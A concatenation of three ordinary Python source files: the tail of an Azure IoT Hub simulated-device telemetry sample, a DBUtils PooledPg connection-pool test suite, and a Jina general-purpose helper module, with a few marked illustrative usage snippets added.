response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
method_response = MethodResponse(method_request.request_id, response_status, payload=response_payload)
device_client.send_method_response(method_response)
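# --- Illustrative sketch (not part of the original sample) ---
# The telemetry payload built from MSG_TXT is plain JSON; the helper below
# shows what a formatted message body looks like and that it round-trips
# through json.loads. It is never called by the sample itself.
def _example_payload():
    import json
    body = MSG_TXT.format(temperature=21.5, humidity=68.0)
    # body == '{"temperature": 21.5,"humidity": 68.0}'
    return json.loads(body)
# The SetTelemetryInterval handler above expects an integer payload; invoking
# that direct method from the cloud side (for example from the Azure portal or
# with `az iot hub invoke-device-method`) with payload 5 slows telemetry to
# one message every five seconds.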
def iothub_client_telemetry_sample_run():
try:
client = iothub_client_init()
print ( "IoT Hub device sending periodic messages, press Ctrl-C to exit" )
# Start a thread to listen
device_method_thread = threading.Thread(target=device_method_listener, args=(client,))
device_method_thread.daemon = True
device_method_thread.start()
while True:
# Build the message with simulated telemetry values.
temperature = TEMPERATURE + (random.random() * 15)
humidity = HUMIDITY + (random.random() * 20)
msg_txt_formatted = MSG_TXT.format(temperature=temperature, humidity=humidity)
message = Message(msg_txt_formatted)
# Add a custom application property to the message.
# An IoT hub can filter on these properties without access to the message body.
if temperature > 30:
message.custom_properties["temperatureAlert"] = "true"
else:
message.custom_properties["temperatureAlert"] = "false"
# Send the message.
print( "Sending message: {}".format(message) )
client.send_message(message)
print( "Message sent" )
time.sleep(INTERVAL)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
if __name__ == '__main__':
print ( "IoT Hub Quickstart #2 - Simulated device" )
print ( "Press Ctrl-C to exit" )
iothub_client_telemetry_sample_run()
|
test_pooled_pg.py
|
"""Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import unittest
from . import mock_pg # noqa
from dbutils.pooled_pg import PooledPg, InvalidConnection, TooManyConnections
class TestPooledPg(unittest.TestCase):
def test_version(self):
from dbutils import __version__, pooled_pg
self.assertEqual(pooled_pg.__version__, __version__)
self.assertEqual(PooledPg.version, __version__)
def test_create_connection(self):
pool = PooledPg(
1, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assertTrue(hasattr(pool, '_maxusage'))
self.assertIsNone(pool._maxusage)
self.assertTrue(hasattr(pool, '_setsession'))
self.assertIsNone(pool._setsession)
self.assertTrue(hasattr(pool, '_reset'))
self.assertFalse(pool._reset)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertTrue(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assertTrue(hasattr(db, 'query'))
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assertTrue(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assertTrue(hasattr(db, '_setsession_sql'))
self.assertIsNone(db._setsession_sql)
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertIsNone(db.dbname)
self.assertTrue(hasattr(db, 'user'))
self.assertIsNone(db.user)
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test_close_connection(self):
pool = PooledPg(
0, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assertTrue(hasattr(db, '_con'))
db_con = db._con
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assertRaises(InvalidConnection, getattr, db, 'num_queries')
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test_min_max_cached(self):
pool = PooledPg(3)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(4)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = [pool.connection() for i in range(10)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test_max_connections(self):
from dbutils.pooled_pg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
del db
del cache
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection()]
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(len(cache), 3)
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assertTrue(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assertFalse(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
del db
def test_one_thread_two_connections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertTrue(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test_three_threads_two_connections(self):
pool = PooledPg(2, 2, 2, True)
from queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
def test_reset_transaction(self):
pool = PooledPg(1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, ['begin', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['rollback', 'begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(
con.session, ['rollback', 'begin', 'rollback', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=2)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, [])
self.assertEqual(con.num_queries, 0)
def test_context_manager(self):
pool = PooledPg(1, 1, 1)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 1)
self.assertRaises(TooManyConnections, pool.connection)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 2)
self.assertRaises(TooManyConnections, pool.connection)
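# --- Illustrative usage sketch (not part of this test module) ---
# Typical application-side usage of PooledPg, shown with made-up database
# credentials; the tests above exercise the same API against a mock backend,
# so this helper is defined only for illustration and never called.
def _example_pooled_pg_usage():
    pool = PooledPg(mincached=2, maxcached=5, maxconnections=10,
                    blocking=True, dbname='mydb', user='myuser')
    db = pool.connection()
    try:
        db.query('select 1')
    finally:
        db.close()  # returns the connection to the pool instead of closing it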
if __name__ == '__main__':
unittest.main()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from contextlib import contextmanager
from datetime import datetime
from itertools import islice
from pathlib import Path
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
]
def deprecated_alias(**aliases):
"""
    Usage: pass kwargs with the deprecated argument name as key and a tuple (new_name, deprecate_level) as value.
    Deprecation level 0 emits a warning, level 1 raises an exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
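# --- Illustrative usage sketch (not part of the original module) ---
# `old_name` and `new_name` below are hypothetical parameter names, chosen only
# to show the decorator in action; the helper is never called by this module.
def _example_deprecated_alias_usage():
    @deprecated_alias(old_name=('new_name', 0))
    def greet(new_name='world'):
        return f'hello {new_name}'
    # Passing the deprecated keyword emits a DeprecationWarning and the value
    # is forwarded to `new_name`, so this returns 'hello jina'.
    return greet(old_name='jina')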
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def call_obj_fn(obj, fn: str):
"""
Get a named attribute from an object; getattr(obj, 'fn') is equivalent to obj.fn.
:param obj: Target object.
:param fn: Desired attribute.
"""
if obj is not None and hasattr(obj, fn):
getattr(obj, fn)()
def touch_dir(base_dir: str) -> None:
"""
Create a directory from given path if it doesn't exist.
:param base_dir: Path of target path.
"""
if not os.path.exists(base_dir):
os.makedirs(base_dir)
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
yield_slice: bool = False,
yield_dict: bool = False,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for batch in batch_iterator(data, batch_size, split_over_axis, yield_slice=yield_slice):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:param yield_slice: Return tuple type of data if True else return np.ndarray type.
:param yield_dict: Return dict type of data if True else return tuple type.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
if yield_slice:
yield tuple(sl)
else:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
if yield_slice:
yield tuple(sl)
else:
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
while True:
if yield_dict:
chunk = dict(islice(data, batch_size))
else:
chunk = tuple(islice(data, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
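# --- Illustrative usage sketch (not part of the original module) ---
# batch_iterator over a plain list; the data below is made up for illustration
# and the helper is never called by the module itself.
def _example_batch_iterator_usage():
    batches = list(batch_iterator(list(range(7)), 3))
    # batches == [[0, 1, 2], [3, 4, 5], [6]]
    return batches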
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
        # strip the brackets and parse each comma-separated element recursively
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
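# --- Illustrative usage sketch (not part of the original module) ---
# How parse_arg coerces a few typical string values; the helper is never
# called by the module itself.
def _example_parse_arg_usage():
    assert parse_arg('8080') == 8080
    assert parse_arg('0.5') == 0.5
    assert parse_arg('true') is True
    assert parse_arg('[a, b]') == ['a', 'b']
    assert parse_arg('"quoted"') == 'quoted'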
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORTS' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'Couldn\'t find an available port in [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
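# --- Illustrative usage sketch (not part of the original module) ---
# expand_dict resolves `{root.<key>}` references and environment variables; the
# keys below are made up for illustration and the helper is never called here.
def _example_expand_dict_usage():
    cfg = {'name': 'demo', 'greeting': 'hello {root.name}', 'workdir': '$HOME'}
    expanded = expand_dict(cfg)
    # expanded['greeting'] == 'hello demo'; 'workdir' is taken from the
    # environment (it stays '$HOME' literally if the variable is unset).
    return expanded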
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
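# --- Illustrative usage sketch (not part of the original module) ---
# colored() wraps text in ANSI escape codes (unless JINA_LOG_NO_COLOR is set);
# the helper is never called by the module itself.
def _example_colored_usage():
    # returns '\x1b[1m\x1b[32mdone\x1b[0m' when coloring is enabled
    return colored('done', color='green', attrs='bold')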
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_parsed_args(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Tuple[List[str], Namespace, List[Any]]:
"""
Get all parsed args info in a dict.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument namespace, positional arguments and unknown arguments
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
if unknown_args:
from jina.logging.predefined import default_logger
default_logger.debug(
f'parser {typename(parser)} can not '
f'recognize the following args: {unknown_args}, '
f'they are ignored. if you are using them from a global args (e.g. Flow), '
f'then please ignore this message'
)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return args, p_args, unknown_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
        :param args: a Namespace, or a dict whose values are Namespace objects (or lists of them).
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
from . import __version__, __proto_version__, __jina_env__, __resources_path__
from google.protobuf.internal import api_implementation
import os, zmq, numpy, google.protobuf, grpc, yaml
from grpc import _grpcio_metadata
import platform
from jina.logging.predefined import default_logger
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', '(unset)'),
'libzmq': zmq.zmq_version(),
            'pyzmq': zmq.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'jina-resources': __resources_path__,
}
env_info = {k: os.getenv(k, '(unset)') for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
from .importer import ImportExtensions
with ImportExtensions(
required=False,
help_text='Jina uses uvloop to manage events and sockets, '
'it often yields better performance than builtin asyncio',
):
import uvloop
